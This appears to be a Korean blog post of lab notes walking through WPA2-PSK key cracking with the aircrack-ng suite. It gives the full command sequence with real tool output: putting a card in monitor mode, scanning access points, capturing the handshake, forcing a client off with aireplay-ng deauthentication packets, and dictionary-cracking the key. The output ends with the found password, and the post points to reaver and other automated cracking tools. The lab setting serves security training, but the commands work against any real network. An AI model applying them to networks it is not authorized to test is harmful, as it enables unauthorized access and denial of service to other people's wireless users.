WPA2 키 크래킹
① 모니터 모드(관리모드 -> 모니터모드)로 전환
# iwconfig
wlan0 IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
lo no wireless extensions. eth0 no wireless extensions. eth1 no wireless extensions. |
=> 카드이름 wlan0을 확인하자. moniter mode와 managed모드가 있다. managed모드는 AP에 붙히는 client가 사용하는 모드이다. 모니터링을 못한다. 그러므로 모니터 모드로 전환하자.
# airmon-ng
PHY Interface Driver Chipset phy0 wlan0 rt2800usb Ralink Technology, Corp. RT5572 |
# airmon-ng start wlan0 <= moniter모드로 전환
Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 3404 NetworkManager 3743 wpa_supplicant Interface Chipset Driver wlan0 Ralink RT2870/3070 rt2800usb - [phy0] (monitor mode enabled on mon0) |
wlan0 물리적 카드이름 mon0은 모니터모드
# airmon-ng check kill (# kill 3404 3743)
Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 3404 NetworkManager 3743 wpa_supplicant Killing all those processes... |
② 공격할 무선 AP를 검색
# airodump-ng mon0 /* 패킷을 캡쳐 /* ng는 넥스트 제너레이션 차세대
CH 13 ][ Elapsed: 16 s ][ 2014-09-12 08:41
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:E5:99:43:65:33 0 176 172 0 3 54e OPN securityhacker4 64:E5:99:43:65:32 0 157 0 0 3 54e WEP WEP securityhacker3 64:E5:99:43:65:31 0 179 27 0 3 54e WPA TKIP PSK securityhacker2 64:E5:99:43:65:30 0 178 277 7 3 54e WPA2 CCMP PSK securityhacker
BSSID STATION PWR Rate Lost Frames Probe
64:E5:99:43:65:33 CC:F9:E8:06:88:88 -1 5e- 0 0 165 64:E5:99:43:65:31 C0:65:99:EB:33:39 0 48e- 6 0 33 64:E5:99:43:65:30 00:11:6B:63:41:A6 0 54 -54 0 48 64:E5:99:43:65:30 64:E5:99:F2:C5:9D -1 58e- 0 0 19 64:E5:99:43:65:30 50:01:BB:F3:E8:5F -1 5e- 0 0 209 (not associated) A0:78:BA:89:3B:90 0 0 - 1 0 2 iptime |
-> 약 1분 정도 검색한 후 <CTRL + C>를 통해 끊는다.
-> 무선 AP의 BSSID와 채널 번호를 기억해야 한다.
-> 만약 airodump-ng 명령어의 출력결과가 없는 경우에는 wlan0 NIC가 up 되어 있는지 확인
# ifconfig
# ifconfig wlan0 up
# airodump-ng mon0
# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 mon0
CH 3 ][ Elapsed: 12 s ][ 2015-05-14 14:36 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:E5:99:43:65:30 -47 9 61 4 0 3 54e WPA2 CCMP PSK securityhacker BSSID STATION PWR Rate Lost Frames Probe
64:E5:99:43:65:30 08:3D:88:1E:79:FD -47 0e- 6 0 9 |
-> 무선 AP에 접속한 사용자 검색
-> 08:3D:88:1E:79:FD 핸드폰의 MAC주소이기 때문에 외우고 있어야 한다.
③ 연결된 스테이션을 DoS 공격을 통해 강제로 연결을 해제 후 재결합 과정을 거치게 한다.
[TERM2] 공격자 윈도우
(명령어 형식)
# airodump -c <채널번호> --bssid <BSSID> -w <저장할 파일> <Monitor Mode LAN Card>
# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 -w /test/WPA2 mon0
CH 3 ][ Elapsed: 24 s ][ 2015-05-14 14:48 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 64:E5:99:43:65:30 -47 20 197 48 2 3 54e WPA2 CCMP PSK securityhacker BSSID STATION PWR Rate Lost Frames Probe 64:E5:99:43:65:30 08:3D:88:1E:79:FD -45 0e- 6 0 25 |
이제 핸드폰을 무선 AP에 접속을 시킨다.(WIFI 기능을 OFF 했다가 다시 ON 한다.) 그리고 airodump 화면을 보면 왼쪽 상단에 "WPA handshake 메세지가 보인다."
[TERM3] 공격자 윈도우
(명령어 형식)
# aireplay-ng -0 <숫자> -a <무선 AP BSSID> -c <STATION MAC> <Monitor Mode LAN Card>
# aireplay-ng --ignore-negative-one -0 5 -a 64:E5:99:43:65:30 -c 08:3D:88:1E:79:FD mon0
/* deauth -a AP -c moblie
14:50:53 Waiting for beacon frame (BSSID: 64:E5:99:43:65:30) on channel -1 14:50:54 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|59 ACKs] 14:50:55 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|62 ACKs] 14:50:56 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|62 ACKs] 14:50:56 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|57 ACKs] 14:50:57 Sending 64 directed DeAuth. STMAC: [08:3D:88:1E:79:FD] [ 0|20 ACKs] |
핸드폰에서 인증을 끊고 다시 연결해 본다.
④ WPA 키를 크랙한다.
[TERM3] 공격자 윈도우
# aircrack-ng -b 64:E5:99:43:65:30 -w /test/dictionary1.txt /test/WPA2-01.cap
No valid WPA handshakes found.. 가 뜨면 패킷을 다시 캡쳐해야 한다.
Aircrack-ng 1.2 beta3 [00:13:40] 2736496 keys tested (3456.23 k/s) KEY FOUND! [ soldesk1. ] Master Key : 31 D9 74 3F 5B 8C 21 B2 C4 34 DB 97 71 36 DC 08 23 70 6D 61 67 83 31 79 03 71 C4 35 07 37 EE A3 Transient Key : CD F4 8A BC 5A AE A1 B6 2C D0 E0 85 3A 05 FE DD B9 BA 61 ED 51 23 52 B8 31 22 91 DF CF AA 5B 61 5F 22 C6 97 59 07 D5 44 A2 EA 5D 7D 95 DD 5C AA DE 7F FD D3 3D E3 EE 05 5E B3 1A 30 75 1F 26 09 EAPOL HMAC : 35 9E 6A 4B E1 6C 48 A5 09 C2 17 6C 2A CB 7E 20 |
-> 많은 시간이 걸린다.
-> 사전 파일을 생성하기 싫다면 아래와 같이 실행한다.
-> (참고) # crunch 9 9 soldesk1. | aircrack-ng 'WPA2-01.cap' -w - -e dlink
(절차정리) WPA2 방식의 암호 크래킹
USB 방식의 무선 랜카드 장착 (물리적으로 장착)
# airmon-ng start wlan0 (wlan0 -> mon0)
# airodump-ng mon0 (WPA 방식의 AP 검색)
# airodump-ng -c 3 --bssid 64:E5:99:43:65:30 -w packet mon0
(WPA 방식의 패킷 캡쳐 & 저장 & 무선 AP 붙어있는 STATION 확인)
# aireplay-ng -0 5 -a 64:E5:99:43:65:30 -c 08:3D:88:1E:79:FD mon0
(무선 AP 붙어 있는 STATION에 deauth 패킷 보내기)
# aircrack-ng -b 64:E5:99:43:65:30 -w dictionary1.txt packet-01.cap
(사전파일 비교를 통해 WPA 암호 크래킹)
[실습] reaver를 통한 Brutus Attack
무선 크랙 도구: reaver(brutus Attack)
- 유튜브 동영상 참고
[실습] easy-creds : 종합 자동도구
bash 쉘 스크립트
- http://sourceforge.net/projects/easy-creds
무선AP를 검색해서 스테이션에 deauth를 보내서 암호를 새로 보내라고하고 암호를 알아낼 수 있다.
[실습] 칼리리눅스
- Wireless Attack > 802.11 Wireless Tools
- (예) fern-wifi-cracker(유튜브 동영상 참고)
'Learning > └◆Wireless Hacking' 카테고리의 다른 글
01. reaver를 통한 Brutus Attack (0) | 2017.02.14 |
---|---|
Fake AP (0) | 2017.02.01 |
WPA Key Cracking (0) | 2017.02.01 |
WEP Password Cracking (0) | 2017.02.01 |